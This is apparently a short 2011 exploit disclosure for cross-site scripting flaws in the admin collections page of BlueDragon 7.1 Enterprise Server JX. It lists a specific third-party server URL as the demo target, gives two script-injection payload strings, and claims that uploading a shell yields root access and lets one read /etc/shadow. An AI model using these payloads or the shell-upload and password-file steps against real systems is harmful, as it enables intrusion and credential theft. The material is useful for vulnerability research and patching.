BlueDragon version 7.1 Enterprise Server JX suffers from multiple cross site scripting vulnerabilities.
8c44b9e31da6fd5f9ec46ce6a6b3c81eeabfc2c04c3437b2c607e358e152d175
# Exploit Title: BlueDragon 7.1 Enterprise Server JX Multiple XSS Vulnerabilities
# Google Dork:
# Cost : 5999$
# Date: 01/08/2011
# Author: www.newatlanta.com/bluedragon/
# Software Link: www.newatlanta.com/bluedragon/
# Version: 7.1
# Tested on: Windows 7 , Ubuntu 11
# CVE :
# Exploit Discovered : SubhashDasyam
# Website : http://www.subhashdasyam.com
http://scotspine.viviotech.net:8080/bluedragon/admin/collections.cfm
In the Name of Collections Enter XSS String like
<BODY ONLOAD=alert('XSS')>
"><< <script>alert('XSS');</script>">
Demo Screen Shot
http://i54.tinypic.com/k2ec05.png
This Enterprise Server Costs you 5999$ per license still there is no Security
You Get Root Access to the Server if you Upload a Shell
One can Access the Shadow File etc /etc/shadow